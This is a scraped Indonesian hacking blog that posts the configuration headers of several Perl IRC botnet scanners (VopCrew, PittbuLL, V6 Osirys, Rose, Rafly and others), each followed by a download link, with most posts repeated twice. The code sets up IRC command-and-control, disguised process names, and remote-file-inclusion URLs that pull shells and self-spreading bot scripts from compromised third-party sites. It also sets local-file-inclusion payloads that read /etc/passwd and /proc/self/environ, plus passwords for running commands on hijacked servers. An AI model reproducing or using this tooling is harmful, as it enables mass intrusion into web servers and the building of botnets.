#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";
Download [lengkap +id]
Pencarian
Labels
- Article (17)
- bug dork lfi (5)
- bug dork list (5)
- bug dork rfi (5)
- bug dork sql (5)
- bug dork timthumb (5)
- bug dork xml (5)
- Dork RFI (8)
- Exploit (5)
- Hacking Tools (52)
- Kill-9 News (14)
- lfi bug dork (5)
- Lfi Dork (3)
- LFI Scanner (5)
- Linux-Kernel (17)
- list bug (5)
- list bug dork (5)
- rfi bug dork (5)
- Rfi Scanner (17)
- SQLi (15)
- tutorial (36)
Statistic User
Showing posts with label Rfi Scanner. Show all posts
Showing posts with label Rfi Scanner. Show all posts
Thursday, 8 July 2010
Saturday, 5 June 2010
BaMbY LFI Scanner
#!/usr/bin/perl
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";
Download [Full+id]
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";
Download [Full+id]
Friday, 4 June 2010
SQL , LFI dan RFI Scanner
#!/usr/bin/perl
############################################
# VopCrew Multi Scanner v5.1 #
# ReCoded by arianom #
# kill.nines[at]gmail[dot]com #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2VopCrew-Multi-Scanner 15) ';
my $injector = $ARGV[7];
my $phpshell = $ARGV[8];
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $mysqlcmd = '!mysql';
my $mssqlcmd = '!mssql';
my $alicmd = '!log';
$rfi_result = "v0pCr3w";
$lfi_test = "../../../../../../../../../../../../../../../etc/passwd";
$lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
$sql_test = "'";
$mysql_output = ("Query failed|Query Error|right syntax to use near");
$mssql_output = ("SQL Server error|Incorrect syntax near|syntax error converting|unclosed quotation");
my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
my $failed = "\n [-] perl $0 \n\n";
if (@ARGV != 9) { print $failed; exit(); } else { print $success; }
Download [Lengkap +id]
NB: Cara menggunakan > perl vopscan.txt
Nanti akan muncul Cara Penggunaan yang benar pada kolom shell anda
############################################
# VopCrew Multi Scanner v5.1 #
# ReCoded by arianom #
# kill.nines[at]gmail[dot]com #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2VopCrew-Multi-Scanner 15) ';
my $injector = $ARGV[7];
my $phpshell = $ARGV[8];
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $mysqlcmd = '!mysql';
my $mssqlcmd = '!mssql';
my $alicmd = '!log';
$rfi_result = "v0pCr3w";
$lfi_test = "../../../../../../../../../../../../../../../etc/passwd";
$lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
$sql_test = "'";
$mysql_output = ("Query failed|Query Error|right syntax to use near");
$mssql_output = ("SQL Server error|Incorrect syntax near|syntax error converting|unclosed quotation");
my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
my $failed = "\n [-] perl $0
if (@ARGV != 9) { print $failed; exit(); } else { print $success; }
Download [Lengkap +id]
NB: Cara menggunakan > perl vopscan.txt
Nanti akan muncul Cara Penggunaan yang benar pada kolom shell anda
Thursday, 3 June 2010
RFI & LFI scanner
***************************
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
#######################################################
## CONFIGURATION //
#######################################################
$auth = "arianom";
$authmail = "arianom\@live.it";
my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode
Download[lengkap + id]
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
#######################################################
## CONFIGURATION //
#######################################################
$auth = "arianom";
$authmail = "arianom\@live.it";
my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode
Download[lengkap + id]
Wednesday, 13 January 2010
PittbuLL Scanner
#!/usr/bin/perl
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
#################
#[Configuration]#
#################
my $response = "http://kill-9.co.tv//arianom/response.txt?"; # included in zip as response.txt
my $test = "http://kill-9.co.tv//arianom/test.txt?"; # included in zip as test.txt
my $printcmd = "http://kill-9.co.tv//arianom/sh.txt?";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://kill-9.co.tv//arianom/spread.txt?";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "irc.killer.server.or.id";
my $port = 6667;
#################
#[Configuration]#
#################
Download [full + id]
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex.
# !lfi Bug Dork ( Ex.
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex.
# !autorfipath Bug Dork ( Ex.
# !afsluiten ( Ex.
# !info ( Ex.
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
#################
#[Configuration]#
#################
my $response = "http://kill-9.co.tv//arianom/response.txt?"; # included in zip as response.txt
my $test = "http://kill-9.co.tv//arianom/test.txt?"; # included in zip as test.txt
my $printcmd = "http://kill-9.co.tv//arianom/sh.txt?";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://kill-9.co.tv//arianom/spread.txt?";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "irc.killer.server.or.id";
my $port = 6667;
#################
#[Configuration]#
#################
Download [full + id]
Sunday, 10 January 2010
V6 Osirys
#!/usr/bin/perl
#####################################################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://ciro1992.org/ciao/id.txt??"; #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.kill-9.server.or.id"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|
------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008
};
Download [lengkap + Id]
#####################################################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://ciro1992.org/ciao/id.txt??"; #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.kill-9.server.or.id"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|
------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008
};
Download [lengkap + Id]
Friday, 8 January 2010
Bjork Scanner
!/usr/bin/perl
###############################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
###############################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="im.not.living.im.just.killing.time";
my $id="http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?";
my $spread="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my $spreads="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='irc.kamtiez.punked.us' unless $servidor;
my $porta='7000';
etc..
Download Full Scanner
###############################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
###############################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="im.not.living.im.just.killing.time";
my $id="http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?";
my $spread="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my $spreads="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='irc.kamtiez.punked.us' unless $servidor;
my $porta='7000';
etc..
Download Full Scanner
Sunday, 20 December 2009
Albania Scanner
***************************
AUTOR: Abah_benu
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?
Download [lengkap + id]
AUTOR: Abah_benu
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?
Download [lengkap + id]
Saturday, 19 December 2009
Rose Scanner
***************************
AUTOR: Tukulesto
DATE :December 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";
@ircservers = (
"209.41.180.98",
#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"
);
Download [lengkap + id]
AUTOR: Tukulesto
DATE :December 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";
@ircservers = (
"209.41.180.98",
#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"
);
Download [lengkap + id]
Friday, 18 December 2009
Rafly Scanner
#!/usr/bin/perl
#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";
Download [lengkap + id]
#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";
Download [lengkap + id]
Pittbull Scanner
***************************
AUTORE: Arianom
DATE :April 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
#################
#[Configuration]#
#################
my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;
#################
#[Configuration]#
#################
Download [lengkap + id]
AUTORE: Arianom
DATE :April 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex.
# !lfi Bug Dork ( Ex.
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex.
# !autorfipath Bug Dork ( Ex.
# !afsluiten ( Ex.
# !info ( Ex.
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
